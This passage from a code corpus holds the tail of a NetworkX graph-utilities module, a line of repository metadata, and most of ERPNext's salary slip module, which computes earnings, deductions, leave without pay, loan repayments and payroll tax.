(sum(d for n, d in G.in_degree())/float(nnodes))
info+="Average out degree: %8.4f"%\
(sum(d for n, d in G.out_degree())/float(nnodes))
else:
s=sum(dict(G.degree()).values())
info+="Average degree: %8.4f"%\
(float(s)/float(nnodes))
else:
if n not in G:
raise nx.NetworkXError("node %s not in graph"%(n,))
info+="Node % s has the following properties:\n"%n
info+="Degree: %d\n"%G.degree(n)
info+="Neighbors: "
info+=' '.join(str(nbr) for nbr in G.neighbors(n))
return info
def set_node_attributes(G, name, values):
"""Set node attributes from dictionary of nodes and values
Parameters
----------
G : NetworkX Graph
name : string
Attribute name
values: dict
Dictionary of attribute values keyed by node. If `values` is not a
dictionary, then it is treated as a single attribute value that is then
applied to every node in `G`.
Examples
--------
>>> G = nx.path_graph(3)
>>> bb = nx.betweenness_centrality(G)
>>> nx.set_node_attributes(G, 'betweenness', bb)
>>> G.node[1]['betweenness']
1.0
"""
try:
values.items
except AttributeError:
# Treat `value` as the attribute value for each node.
values = dict(zip(G.nodes(), [values] * len(G)))
for node, value in values.items():
G.node[node][name] = value
def get_node_attributes(G, name):
"""Get node attributes from graph
Parameters
----------
G : NetworkX Graph
name : string
Attribute name
Returns
-------
Dictionary of attributes keyed by node.
Examples
--------
>>> G=nx.Graph()
>>> G.add_nodes_from([1,2,3],color='red')
>>> color=nx.get_node_attributes(G,'color')
>>> color[1]
'red'
"""
return dict( (n,d[name]) for n,d in G.node.items() if name in d)
def set_edge_attributes(G, name, values):
"""Set edge attributes from dictionary of edge tuples and values.
Parameters
----------
G : NetworkX Graph
name : string
Attribute name
values : dict
Dictionary of attribute values keyed by edge (tuple). For multigraphs,
the keys tuples must be of the form (u, v, key). For non-multigraphs,
the keys must be tuples of the form (u, v). If `values` is not a
dictionary, then it is treated as a single attribute value that is then
applied to every edge in `G`.
Examples
--------
>>> G = nx.path_graph(3)
>>> bb = nx.edge_betweenness_centrality(G, normalized=False)
>>> nx.set_edge_attributes(G, 'betweenness', bb)
>>> G[1][2]['betweenness']
2.0
"""
try:
values.items
except AttributeError:
# Treat `value` as the attribute value for each edge.
if G.is_multigraph():
edges = list(G.edges(keys=True))
else:
edges = list(G.edges())
values = dict(zip(edges, [values] * len(list(edges))))
if G.is_multigraph():
for (u, v, key), value in values.items():
G[u][v][key][name] = value
else:
for (u, v), value in values.items():
G[u][v][name] = value
def get_edge_attributes(G, name):
"""Get edge attributes from graph
Parameters
----------
G : NetworkX Graph
name : string
Attribute name
Returns
-------
Dictionary of attributes keyed by edge. For (di)graphs, the keys are
2-tuples of the form: (u,v). For multi(di)graphs, the keys are 3-tuples of
the form: (u, v, key).
Examples
--------
>>> G=nx.Graph()
>>> G.add_path([1,2,3],color='red')
>>> color=nx.get_edge_attributes(G,'color')
>>> color[(1,2)]
'red'
"""
if G.is_multigraph():
edges = G.edges(keys=True, data=True)
else:
edges = G.edges(data=True)
return dict( (x[:-1], x[-1][name]) for x in edges if name in x[-1] )
def all_neighbors(graph, node):
""" Returns all of the neighbors of a node in the graph.
If the graph is directed returns predecessors as well as successors.
Parameters
----------
graph : NetworkX graph
Graph to find neighbors.
node : node
The node whose neighbors will be returned.
Returns
-------
neighbors : iterator
Iterator of neighbors
"""
if graph.is_directed():
values = itertools.chain.from_iterable([graph.predecessors(node),
graph.successors(node)])
else:
values = graph.neighbors(node)
return values
def non_neighbors(graph, node):
"""Returns the non-neighbors of the node in the graph.
Parameters
----------
graph : NetworkX graph
Graph to find neighbors.
node : node
The node whose neighbors will be returned.
Returns
-------
non_neighbors : iterator
Iterator of nodes in the graph that are not neighbors of the node.
"""
nbors = set(neighbors(graph, node)) | set([node])
return (nnode for nnode in graph if nnode not in nbors)
def non_edges(graph):
"""Returns the non-existent edges in the graph.
Parameters
----------
graph : NetworkX graph.
Graph to find non-existent edges.
Returns
-------
non_edges : iterator
Iterator of edges that are not in the graph.
"""
if graph.is_directed():
for u in graph.nodes():
for v in non_neighbors(graph, u):
yield (u, v)
else:
nodes = set(graph)
while nodes:
u = nodes.pop()
for v in nodes - set(graph[u]):
yield (u, v)
@not_implemented_for('directed')
def common_neighbors(G, u, v):
"""Return the common neighbors of two nodes in a graph.
Parameters
----------
G : graph
A NetworkX undirected graph.
u, v : nodes
Nodes in the graph.
Returns
-------
cnbors : iterator
Iterator of common neighbors of u and v in the graph.
Raises
------
NetworkXError
If u or v is not a node in the graph.
Examples
--------
>>> G = nx.complete_graph(5)
>>> sorted(nx.common_neighbors(G, 0, 1))
[2, 3, 4]
"""
if u not in G:
raise nx.NetworkXError('u is not in the graph.')
if v not in G:
raise nx.NetworkXError('v is not in the graph.')
# Return a generator explicitly instead of yielding so that the above
# checks are executed eagerly.
return (w for w in G[u] if w in G[v] and w not in (u, v))
def is_weighted(G, edge=None, weight='weight'):
"""Returns ``True`` if ``G`` has weighted edges.
Parameters
----------
G : graph
A NetworkX graph.
edge : tuple, optional
A 2-tuple specifying the only edge in ``G`` that will be tested. If
``None``, then every edge in ``G`` is tested.
weight: string, optional
The attribute name used to query for edge weights.
Returns
-------
bool
A boolean signifying if ``G``, or the specified edge, is weighted.
Raises
------
NetworkXError
If the specified edge does not exist.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.is_weighted(G)
False
>>> nx.is_weighted(G, (2, 3))
False
>>> G = nx.DiGraph()
>>> G.add_edge(1, 2, weight=1)
>>> nx.is_weighted(G)
True
"""
if edge is not None:
data = G.get_edge_data(*edge)
if data is None:
msg = 'Edge {!r} does not exist.'.format(edge)
raise nx.NetworkXError(msg)
return weight in data
if is_empty(G):
# Special handling required since: all([]) == True
return False
return all(weight in data for u, v, data in G.edges(data=True))
def is_negatively_weighted(G, edge=None, weight='weight'):
"""Returns ``True`` if ``G`` has negatively weighted edges.
Parameters
----------
G : graph
A NetworkX graph.
edge : tuple, optional
A 2-tuple specifying the only edge in ``G`` that will be tested. If
``None``, then every edge in ``G`` is tested.
weight: string, optional
The attribute name used to query for edge weights.
Returns
-------
bool
A boolean signifying if ``G``, or the specified edge, is negatively
weighted.
Raises
------
NetworkXError
If the specified edge does not exist.
Examples
--------
>>> G=nx.Graph()
>>> G.add_edges_from([(1, 3), (2, 4), (2, 6)])
>>> G.add_edge(1, 2, weight=4)
>>> nx.is_negatively_weighted(G, (1, 2))
False
>>> G[2][4]['weight'] = -2
>>> nx.is_negatively_weighted(G)
True
>>> G = nx.DiGraph()
>>> G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5), ('1', '0', -2)])
>>> nx.is_negatively_weighted(G)
True
"""
if edge is not None:
data = G.get_edge_data(*edge)
if data is None:
msg = 'Edge {!r} does not exist.'.format(edge)
raise nx.NetworkXError(msg)
return weight in data and data[weight] < 0
return any(weight in data and data[weight] < 0
for u, v, data in G.edges(data=True))
def is_empty(G):
"""Returns ``True`` if ``G`` has no edges.
Parameters
----------
G : graph
A NetworkX graph.
Returns
-------
bool
``True`` if ``G`` has no edges, and ``False`` otherwise.
Notes
-----
An empty graph can have nodes but not edges. The empty graph with zero
nodes is known as the null graph. This is an O(n) operation where n is the
number of nodes in the graph.
"""
return not any(G.adj.values())
|
bsd-3-clause
| -4,094,525,715,898,061,000
| 23.899848
| 82
| 0.566945
| false
| 3.7049
| false
| false
| false
|
ESS-LLP/erpnext-healthcare
|
erpnext/hr/doctype/salary_slip/salary_slip.py
|
1
|
34819
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, erpnext
import datetime
from frappe.utils import add_days, cint, cstr, flt, getdate, rounded, date_diff, money_in_words, getdate
from frappe.model.naming import make_autoname
from frappe import msgprint, _
from erpnext.hr.doctype.payroll_entry.payroll_entry import get_start_end_dates
from erpnext.hr.doctype.employee.employee import get_holiday_list_for_employee
from erpnext.utilities.transaction_base import TransactionBase
from frappe.utils.background_jobs import enqueue
from erpnext.hr.doctype.additional_salary.additional_salary import get_additional_salary_component
from erpnext.hr.utils import get_payroll_period
from erpnext.hr.doctype.employee_benefit_application.employee_benefit_application import get_benefit_component_amount
from erpnext.hr.doctype.employee_benefit_claim.employee_benefit_claim import get_benefit_claim_amount, get_last_payroll_period_benefits
class SalarySlip(TransactionBase):
def __init__(self, *args, **kwargs):
super(SalarySlip, self).__init__(*args, **kwargs)
self.series = 'Sal Slip/{0}/.#####'.format(self.employee)
self.whitelisted_globals = {
"int": int,
"float": float,
"long": int,
"round": round,
"date": datetime.date,
"getdate": getdate
}
def autoname(self):
self.name = make_autoname(self.series)
def validate(self):
self.status = self.get_status()
self.validate_dates()
self.check_existing()
if not self.salary_slip_based_on_timesheet:
self.get_date_details()
if not (len(self.get("earnings")) or len(self.get("deductions"))):
# get details from salary structure
self.get_emp_and_leave_details()
else:
self.get_leave_details(lwp = self.leave_without_pay)
# if self.salary_slip_based_on_timesheet or not self.net_pay:
self.calculate_net_pay()
company_currency = erpnext.get_company_currency(self.company)
self.total_in_words = money_in_words(self.rounded_total, company_currency)
if frappe.db.get_single_value("HR Settings", "max_working_hours_against_timesheet"):
max_working_hours = frappe.db.get_single_value("HR Settings", "max_working_hours_against_timesheet")
if self.salary_slip_based_on_timesheet and (self.total_working_hours > int(max_working_hours)):
frappe.msgprint(_("Total working hours should not be greater than max working hours {0}").
format(max_working_hours), alert=True)
def validate_dates(self):
if date_diff(self.end_date, self.start_date) < 0:
frappe.throw(_("To date cannot be before From date"))
def calculate_component_amounts(self):
if not getattr(self, '_salary_structure_doc', None):
self._salary_structure_doc = frappe.get_doc('Salary Structure', self.salary_structure)
data = self.get_data_for_eval()
for key in ('earnings', 'deductions'):
for struct_row in self._salary_structure_doc.get(key):
amount = self.eval_condition_and_formula(struct_row, data)
if amount and struct_row.statistical_component == 0:
self.update_component_row(struct_row, amount, key)
if key=="earnings" and struct_row.is_flexible_benefit == 1:
self.add_employee_flexi_benefits(struct_row)
additional_components = get_additional_salary_component(self.employee, self.start_date, self.end_date)
if additional_components:
for additional_component in additional_components:
additional_component = frappe._dict(additional_component)
amount = additional_component.amount
overwrite = additional_component.overwrite
key = "earnings"
if additional_component.type == "Deduction":
key = "deductions"
self.update_component_row(frappe._dict(additional_component.struct_row), amount, key, overwrite=overwrite)
self.get_last_payroll_period_benefit()
# Calculate variable_based_on_taxable_salary after all components updated in salary slip
for struct_row in self._salary_structure_doc.get("deductions"):
if struct_row.variable_based_on_taxable_salary == 1 and not struct_row.formula and not struct_row.amount:
tax_detail = self.calculate_variable_based_on_taxable_salary(struct_row.salary_component)
if tax_detail and tax_detail[1]:
self.update_component_row(frappe._dict(tax_detail[0]), tax_detail[1], "deductions", tax_detail[2], tax_detail[3])
def get_last_payroll_period_benefit(self):
payroll_period = get_payroll_period(self.start_date, self.end_date, self.company)
if payroll_period:
# Check for last payroll period
if (getdate(payroll_period.end_date) <= getdate(self.end_date)):
current_flexi_amount = 0
for d in self.get("earnings"):
if d.is_flexible_benefit == 1:
current_flexi_amount += d.amount
last_benefits = get_last_payroll_period_benefits(self.employee, self.start_date, self.end_date,\
current_flexi_amount, payroll_period, self._salary_structure_doc)
if last_benefits:
for last_benefit in last_benefits:
last_benefit = frappe._dict(last_benefit)
amount = last_benefit.amount
self.update_component_row(frappe._dict(last_benefit.struct_row), amount, "earnings")
def add_employee_flexi_benefits(self, struct_row):
if frappe.db.get_value("Salary Component", struct_row.salary_component, "pay_against_benefit_claim") != 1:
benefit_component_amount = get_benefit_component_amount(self.employee, self.start_date, self.end_date, \
struct_row, self._salary_structure_doc, self.total_working_days, self.payroll_frequency)
if benefit_component_amount:
self.update_component_row(struct_row, benefit_component_amount, "earnings")
else:
benefit_claim_amount = get_benefit_claim_amount(self.employee, self.start_date, self.end_date, struct_row.salary_component)
if benefit_claim_amount:
self.update_component_row(struct_row, benefit_claim_amount, "earnings")
def update_component_row(self, struct_row, amount, key, benefit_tax=None, additional_tax=None, overwrite=1):
component_row = None
for d in self.get(key):
if d.salary_component == struct_row.salary_component:
component_row = d
if not component_row:
self.append(key, {
'amount': amount,
'default_amount': amount,
'depends_on_lwp' : struct_row.depends_on_lwp,
'salary_component' : struct_row.salary_component,
'abbr' : struct_row.abbr,
'do_not_include_in_total' : struct_row.do_not_include_in_total,
'is_tax_applicable': struct_row.is_tax_applicable,
'is_flexible_benefit': struct_row.is_flexible_benefit,
'variable_based_on_taxable_salary': struct_row.variable_based_on_taxable_salary,
'is_additional_component': struct_row.is_additional_component,
'tax_on_flexible_benefit': benefit_tax,
'tax_on_additional_salary': additional_tax
})
else:
if overwrite:
component_row.default_amount = amount
component_row.amount = amount
else:
component_row.default_amount += amount
component_row.amount = component_row.default_amount
component_row.tax_on_flexible_benefit = benefit_tax
component_row.tax_on_additional_salary = additional_tax
def eval_condition_and_formula(self, d, data):
try:
condition = d.condition.strip() if d.condition else None
if condition:
if not frappe.safe_eval(condition, self.whitelisted_globals, data):
return None
amount = d.amount
if d.amount_based_on_formula:
formula = d.formula.strip() if d.formula else None
if formula:
amount = frappe.safe_eval(formula, self.whitelisted_globals, data)
if amount:
data[d.abbr] = amount
return amount
except NameError as err:
frappe.throw(_("Name error: {0}".format(err)))
except SyntaxError as err:
frappe.throw(_("Syntax error in formula or condition: {0}".format(err)))
except Exception as e:
frappe.throw(_("Error in formula or condition: {0}".format(e)))
raise
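# Illustrative example (hypothetical values, not from the original file):
# for a struct row with condition "base > 10000", amount_based_on_formula
# set and formula "base * 0.1", evaluating against data = {"base": 20000}
# passes the condition, returns 2000.0, and stores it under the row's
# abbreviation so later formulas can reference it.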
def get_data_for_eval(self):
'''Returns data for evaluating formula'''
data = frappe._dict()
data.update(frappe.get_doc("Salary Structure Assignment",
{"employee": self.employee, "salary_structure": self.salary_structure}).as_dict())
data.update(frappe.get_doc("Employee", self.employee).as_dict())
data.update(self.as_dict())
# set values for components
salary_components = frappe.get_all("Salary Component", fields=["salary_component_abbr"])
for sc in salary_components:
data.setdefault(sc.salary_component_abbr, 0)
for key in ('earnings', 'deductions'):
for d in self.get(key):
data[d.abbr] = d.amount
return data
def get_emp_and_leave_details(self):
'''First time, load all the components from salary structure'''
if self.employee:
self.set("earnings", [])
self.set("deductions", [])
if not self.salary_slip_based_on_timesheet:
self.get_date_details()
self.validate_dates()
joining_date, relieving_date = frappe.db.get_value("Employee", self.employee,
["date_of_joining", "relieving_date"])
self.get_leave_details(joining_date, relieving_date)
struct = self.check_sal_struct(joining_date, relieving_date)
if struct:
self._salary_structure_doc = frappe.get_doc('Salary Structure', struct)
self.salary_slip_based_on_timesheet = self._salary_structure_doc.salary_slip_based_on_timesheet or 0
self.set_time_sheet()
self.pull_sal_struct()
def set_time_sheet(self):
if self.salary_slip_based_on_timesheet:
self.set("timesheets", [])
timesheets = frappe.db.sql(""" select * from `tabTimesheet` where employee = %(employee)s and start_date BETWEEN %(start_date)s AND %(end_date)s and (status = 'Submitted' or
status = 'Billed')""", {'employee': self.employee, 'start_date': self.start_date, 'end_date': self.end_date}, as_dict=1)
for data in timesheets:
self.append('timesheets', {
'time_sheet': data.name,
'working_hours': data.total_hours
})
def get_date_details(self):
if not self.end_date:
date_details = get_start_end_dates(self.payroll_frequency, self.start_date or self.posting_date)
self.start_date = date_details.start_date
self.end_date = date_details.end_date
def check_sal_struct(self, joining_date, relieving_date):
cond = """and sa.employee=%(employee)s and (sa.from_date <= %(start_date)s or
sa.from_date <= %(end_date)s or sa.from_date <= %(joining_date)s)"""
if self.payroll_frequency:
cond += """and ss.payroll_frequency = '%(payroll_frequency)s'""" % {"payroll_frequency": self.payroll_frequency}
st_name = frappe.db.sql("""
select sa.salary_structure
from `tabSalary Structure Assignment` sa join `tabSalary Structure` ss
where sa.salary_structure=ss.name
and sa.docstatus = 1 and ss.docstatus = 1 and ss.is_active ='Yes' %s
order by sa.from_date desc
limit 1
""" %cond, {'employee': self.employee, 'start_date': self.start_date,
'end_date': self.end_date, 'joining_date': joining_date})
if st_name:
self.salary_structure = st_name[0][0]
return self.salary_structure
else:
self.salary_structure = None
frappe.msgprint(_("No active or default Salary Structure found for employee {0} for the given dates")
.format(self.employee), title=_('Salary Structure Missing'))
def pull_sal_struct(self):
from erpnext.hr.doctype.salary_structure.salary_structure import make_salary_slip
if self.salary_slip_based_on_timesheet:
self.salary_structure = self._salary_structure_doc.name
self.hour_rate = self._salary_structure_doc.hour_rate
self.total_working_hours = sum([d.working_hours or 0.0 for d in self.timesheets]) or 0.0
wages_amount = self.hour_rate * self.total_working_hours
self.add_earning_for_hourly_wages(self, self._salary_structure_doc.salary_component, wages_amount)
make_salary_slip(self._salary_structure_doc.name, self)
def process_salary_structure(self):
'''Calculate salary after salary structure details have been updated'''
if not self.salary_slip_based_on_timesheet:
self.get_date_details()
self.pull_emp_details()
self.get_leave_details()
self.calculate_net_pay()
def add_earning_for_hourly_wages(self, doc, salary_component, amount):
row_exists = False
for row in doc.earnings:
if row.salary_component == salary_component:
row.amount = amount
row_exists = True
break
if not row_exists:
wages_row = {
"salary_component": salary_component,
"abbr": frappe.db.get_value("Salary Component", salary_component, "salary_component_abbr"),
"amount": self.hour_rate * self.total_working_hours
}
doc.append('earnings', wages_row)
def pull_emp_details(self):
emp = frappe.db.get_value("Employee", self.employee, ["bank_name", "bank_ac_no"], as_dict=1)
if emp:
self.bank_name = emp.bank_name
self.bank_account_no = emp.bank_ac_no
def get_leave_details(self, joining_date=None, relieving_date=None, lwp=None):
if not joining_date:
joining_date, relieving_date = frappe.db.get_value("Employee", self.employee,
["date_of_joining", "relieving_date"])
holidays = self.get_holidays_for_employee(self.start_date, self.end_date)
working_days = date_diff(self.end_date, self.start_date) + 1
actual_lwp = self.calculate_lwp(holidays, working_days)
if not cint(frappe.db.get_value("HR Settings", None, "include_holidays_in_total_working_days")):
working_days -= len(holidays)
if working_days < 0:
frappe.throw(_("There are more holidays than working days this month."))
if not lwp:
lwp = actual_lwp
elif lwp != actual_lwp:
frappe.msgprint(_("Leave Without Pay does not match with approved Leave Application records"))
self.total_working_days = working_days
self.leave_without_pay = lwp
payment_days = flt(self.get_payment_days(joining_date, relieving_date)) - flt(lwp)
self.payment_days = payment_days > 0 and payment_days or 0
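# Worked example (illustrative figures): in a 31-day month with 4 holidays
# and "include holidays in total working days" unticked, working_days
# becomes 27; with 2 days of leave without pay and an employee present for
# the whole period, payment_days = 27 - 2 = 25.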
def get_payment_days(self, joining_date, relieving_date):
start_date = getdate(self.start_date)
if joining_date:
if getdate(self.start_date) <= joining_date <= getdate(self.end_date):
start_date = joining_date
elif joining_date > getdate(self.end_date):
return
end_date = getdate(self.end_date)
if relieving_date:
if getdate(self.start_date) <= relieving_date <= getdate(self.end_date):
end_date = relieving_date
elif relieving_date < getdate(self.start_date):
frappe.throw(_("Employee relieved on {0} must be set as 'Left'")
.format(relieving_date))
payment_days = date_diff(end_date, start_date) + 1
if not cint(frappe.db.get_value("HR Settings", None, "include_holidays_in_total_working_days")):
holidays = self.get_holidays_for_employee(start_date, end_date)
payment_days -= len(holidays)
return payment_days
def get_holidays_for_employee(self, start_date, end_date):
holiday_list = get_holiday_list_for_employee(self.employee)
holidays = frappe.db.sql_list('''select holiday_date from `tabHoliday`
where
parent=%(holiday_list)s
and holiday_date >= %(start_date)s
and holiday_date <= %(end_date)s''', {
"holiday_list": holiday_list,
"start_date": start_date,
"end_date": end_date
})
holidays = [cstr(i) for i in holidays]
return holidays
def calculate_lwp(self, holidays, working_days):
lwp = 0
holidays = "','".join(holidays)
for d in range(working_days):
dt = add_days(cstr(getdate(self.start_date)), d)
leave = frappe.db.sql("""
select t1.name, t1.half_day
from `tabLeave Application` t1, `tabLeave Type` t2
where t2.name = t1.leave_type
and t2.is_lwp = 1
and t1.docstatus = 1
and t1.employee = %(employee)s
and CASE WHEN t2.include_holiday != 1 THEN %(dt)s not in ('{0}') and %(dt)s between from_date and to_date and ifnull(t1.salary_slip, '') = ''
WHEN t2.include_holiday THEN %(dt)s between from_date and to_date and ifnull(t1.salary_slip, '') = ''
END
""".format(holidays), {"employee": self.employee, "dt": dt})
if leave:
lwp = cint(leave[0][1]) and (lwp + 0.5) or (lwp + 1)
return lwp
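# Note (read from the logic above): each day of leave-without-pay adds 1
# to lwp, or 0.5 when the leave application is marked half_day, so two
# half-day LWP leaves count as one full unpaid day.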
def check_existing(self):
if not self.salary_slip_based_on_timesheet:
ret_exist = frappe.db.sql("""select name from `tabSalary Slip`
where start_date = %s and end_date = %s and docstatus != 2
and employee = %s and name != %s""",
(self.start_date, self.end_date, self.employee, self.name))
if ret_exist:
employee = self.employee
self.employee = ''
frappe.throw(_("Salary Slip of employee {0} already created for this period").format(employee))
else:
for data in self.timesheets:
if frappe.db.get_value('Timesheet', data.time_sheet, 'status') == 'Payrolled':
frappe.throw(_("Salary Slip of employee {0} already created for time sheet {1}").format(self.employee, data.time_sheet))
def sum_components(self, component_type, total_field, precision):
joining_date, relieving_date = frappe.db.get_value("Employee", self.employee,
["date_of_joining", "relieving_date"])
if not relieving_date:
relieving_date = getdate(self.end_date)
if not joining_date:
frappe.throw(_("Please set the Date Of Joining for employee {0}").format(frappe.bold(self.employee_name)))
for d in self.get(component_type):
if (self.salary_structure and
cint(d.depends_on_lwp) and
(not
self.salary_slip_based_on_timesheet or
getdate(self.start_date) < joining_date or
getdate(self.end_date) > relieving_date
)):
d.amount = rounded(
(flt(d.default_amount, precision) * flt(self.payment_days)
/ cint(self.total_working_days)), self.precision("amount", component_type)
)
elif not self.payment_days and not self.salary_slip_based_on_timesheet and \
cint(d.depends_on_lwp):
d.amount = 0
elif not d.amount:
d.amount = d.default_amount
if not d.do_not_include_in_total:
self.set(total_field, self.get(total_field) + flt(d.amount, precision))
def calculate_net_pay(self):
if self.salary_structure:
self.calculate_component_amounts()
disable_rounded_total = cint(frappe.db.get_value("Global Defaults", None, "disable_rounded_total"))
precision = frappe.defaults.get_global_default("currency_precision")
self.total_deduction = 0
self.gross_pay = 0
self.sum_components('earnings', 'gross_pay', precision)
self.sum_components('deductions', 'total_deduction', precision)
self.set_loan_repayment()
self.net_pay = flt(self.gross_pay) - (flt(self.total_deduction) + flt(self.total_loan_repayment))
self.rounded_total = rounded(self.net_pay,
self.precision("net_pay") if disable_rounded_total else 0)
if self.net_pay < 0:
frappe.throw(_("Net Pay cannnot be negative"))
def set_loan_repayment(self):
self.set('loans', [])
self.total_loan_repayment = 0
self.total_interest_amount = 0
self.total_principal_amount = 0
for loan in self.get_loan_details():
self.append('loans', {
'loan': loan.name,
'total_payment': loan.total_payment,
'interest_amount': loan.interest_amount,
'principal_amount': loan.principal_amount,
'loan_account': loan.loan_account,
'interest_income_account': loan.interest_income_account
})
self.total_loan_repayment += loan.total_payment
self.total_interest_amount += loan.interest_amount
self.total_principal_amount += loan.principal_amount
def get_loan_details(self):
return frappe.db.sql("""select rps.principal_amount, rps.interest_amount, l.name,
rps.total_payment, l.loan_account, l.interest_income_account
from
`tabRepayment Schedule` as rps, `tabLoan` as l
where
l.name = rps.parent and rps.payment_date between %s and %s and
l.repay_from_salary = 1 and l.docstatus = 1 and l.applicant = %s""",
(self.start_date, self.end_date, self.employee), as_dict=True) or []
def on_submit(self):
if self.net_pay < 0:
frappe.throw(_("Net Pay cannot be less than 0"))
else:
self.set_status()
self.update_status(self.name)
self.update_salary_slip_in_additional_salary()
if (frappe.db.get_single_value("HR Settings", "email_salary_slip_to_employee")) and not frappe.flags.via_payroll_entry:
self.email_salary_slip()
def on_cancel(self):
self.set_status()
self.update_status()
self.update_salary_slip_in_additional_salary()
def on_trash(self):
from frappe.model.naming import revert_series_if_last
revert_series_if_last(self.series, self.name)
def update_salary_slip_in_additional_salary(self):
salary_slip = self.name if self.docstatus==1 else None
frappe.db.sql("""
update `tabAdditional Salary` set salary_slip=%s
where employee=%s and payroll_date between %s and %s and docstatus=1
""", (salary_slip, self.employee, self.start_date, self.end_date))
def email_salary_slip(self):
receiver = frappe.db.get_value("Employee", self.employee, "prefered_email")
if receiver:
email_args = {
"recipients": [receiver],
"message": _("Please see attachment"),
"subject": 'Salary Slip - from {0} to {1}'.format(self.start_date, self.end_date),
"attachments": [frappe.attach_print(self.doctype, self.name, file_name=self.name)],
"reference_doctype": self.doctype,
"reference_name": self.name
}
if not frappe.flags.in_test:
enqueue(method=frappe.sendmail, queue='short', timeout=300, is_async=True, **email_args)
else:
frappe.sendmail(**email_args)
else:
msgprint(_("{0}: Employee email not found, hence email not sent").format(self.employee_name))
def update_status(self, salary_slip=None):
for data in self.timesheets:
if data.time_sheet:
timesheet = frappe.get_doc('Timesheet', data.time_sheet)
timesheet.salary_slip = salary_slip
timesheet.flags.ignore_validate_update_after_submit = True
timesheet.set_status()
timesheet.save()
def set_status(self, status=None):
'''Get and update status'''
if not status:
status = self.get_status()
self.db_set("status", status)
def get_status(self):
if self.docstatus == 0:
status = "Draft"
elif self.docstatus == 1:
status = "Submitted"
elif self.docstatus == 2:
status = "Cancelled"
return status
def calculate_variable_based_on_taxable_salary(self, tax_component):
payroll_period = get_payroll_period(self.start_date, self.end_date, self.company)
if not payroll_period:
frappe.msgprint(_("Start and end dates not in a valid Payroll Period, cannot calculate {0}.")
.format(tax_component))
return False
if payroll_period.end_date <= getdate(self.end_date):
if not self.deduct_tax_for_unsubmitted_tax_exemption_proof or not\
self.deduct_tax_for_unclaimed_employee_benefits:
frappe.throw(_("You have to Deduct Tax for Unsubmitted Tax Exemption Proof and Unclaimed \
Employee Benefits in the last Salary Slip of Payroll Period"))
# calc prorata tax to be applied
return self.calculate_variable_tax(tax_component, payroll_period)
def calculate_variable_tax(self, tax_component, payroll_period):
annual_taxable_earning, period_factor = 0, 0
pro_rata_tax_paid, additional_tax_paid, benefit_tax_paid = 0, 0, 0
unclaimed_earning, unclaimed_benefit, additional_income = 0, 0, 0
# get taxable_earning, additional_income in this slip
taxable_earning = self.get_taxable_earnings()
if self.deduct_tax_for_unclaimed_employee_benefits:
# get all untaxed benefits till date, pass amount to be taxed by later methods
unclaimed_benefit = self.calculate_unclaimed_taxable_benefit(payroll_period)
# flexi's excluded from monthly tax, add flexis in this slip to unclaimed_benefit
unclaimed_benefit += self.get_taxable_earnings(only_flexi=True)["taxable_earning"]
if self.deduct_tax_for_unsubmitted_tax_exemption_proof:
# do not consider exemption, calc tax to be paid for the period till date
# considering prorata taxes paid and proofs submitted
unclaimed_earning = self.calculate_unclaimed_taxable_earning(payroll_period, tax_component)
earning_in_period = taxable_earning["taxable_earning"] + unclaimed_earning
period_factor = self.get_period_factor(payroll_period.start_date, payroll_period.end_date,
payroll_period.start_date, self.end_date)
annual_taxable_earning = earning_in_period * period_factor
additional_income += self.get_total_additional_income(payroll_period.start_date)
else:
# consider exemption declaration, find annual_earning by monthly taxable salary
period_factor = self.get_period_factor(payroll_period.start_date, payroll_period.end_date)
annual_earning = taxable_earning["taxable_earning"] * period_factor
exemption_amount = 0
if frappe.db.exists("Employee Tax Exemption Declaration", {"employee": self.employee,
"payroll_period": payroll_period.name, "docstatus": 1}):
exemption_amount = frappe.db.get_value("Employee Tax Exemption Declaration",
{"employee": self.employee, "payroll_period": payroll_period.name, "docstatus": 1},
"total_exemption_amount")
annual_taxable_earning = annual_earning - exemption_amount
if self.deduct_tax_for_unclaimed_employee_benefits or self.deduct_tax_for_unsubmitted_tax_exemption_proof:
tax_detail = self.get_tax_paid_in_period(payroll_period, tax_component)
if tax_detail:
pro_rata_tax_paid = tax_detail["total_tax_paid"] - tax_detail["additional_tax"] - tax_detail["benefit_tax"]
additional_tax_paid = tax_detail["additional_tax"]
benefit_tax_paid = tax_detail["benefit_tax"]
# add any additional income in this slip
additional_income += taxable_earning["additional_income"]
args = {"payroll_period": payroll_period.name, "tax_component": tax_component,
"annual_taxable_earning": annual_taxable_earning, "period_factor": period_factor,
"unclaimed_benefit": unclaimed_benefit, "additional_income": additional_income,
"pro_rata_tax_paid": pro_rata_tax_paid, "benefit_tax_paid": benefit_tax_paid,
"additional_tax_paid": additional_tax_paid}
return self.calculate_tax(args)
def calculate_unclaimed_taxable_benefit(self, payroll_period):
total_benefit, total_benefit_claim = 0, 0
# get total sum of benefits paid
sum_benefit = frappe.db.sql("""select sum(sd.amount) from `tabSalary Detail` sd join
`tabSalary Slip` ss on sd.parent=ss.name where sd.parentfield='earnings'
and sd.is_tax_applicable=1 and is_flexible_benefit=1 and ss.docstatus=1
and ss.employee='{0}' and ss.start_date between '{1}' and '{2}' and
ss.end_date between '{1}' and '{2}'""".format(self.employee,
payroll_period.start_date, self.start_date))
if sum_benefit and sum_benefit[0][0]:
total_benefit = sum_benefit[0][0]
# get total benefits claimed
sum_benefit_claim = frappe.db.sql("""select sum(claimed_amount) from
`tabEmployee Benefit Claim` where docstatus=1 and employee='{0}' and claim_date
between '{1}' and '{2}'""".format(self.employee, payroll_period.start_date, self.end_date))
if sum_benefit_claim and sum_benefit_claim[0][0]:
total_benefit_claim = sum_benefit_claim[0][0]
return total_benefit - total_benefit_claim
def calculate_unclaimed_taxable_earning(self, payroll_period, tax_component):
total_taxable_earning, total_exemption_amount = 0, 0
# calc total taxable amount in period
sum_taxable_earning = frappe.db.sql("""select sum(sd.amount) from `tabSalary Detail` sd join
`tabSalary Slip` ss on sd.parent=ss.name where sd.parentfield='earnings'
and sd.is_tax_applicable=1 and is_additional_component=0 and is_flexible_benefit=0
and ss.docstatus=1 and ss.employee='{0}' and ss.start_date between '{1}' and '{2}'
and ss.end_date between '{1}' and '{2}'""".format(self.employee,
payroll_period.start_date, self.start_date))
if sum_taxable_earning and sum_taxable_earning[0][0]:
total_taxable_earning = sum_taxable_earning[0][0]
# add up total Proof Submission
sum_exemption = frappe.db.sql("""select sum(exemption_amount) from
`tabEmployee Tax Exemption Proof Submission` where docstatus=1 and employee='{0}' and
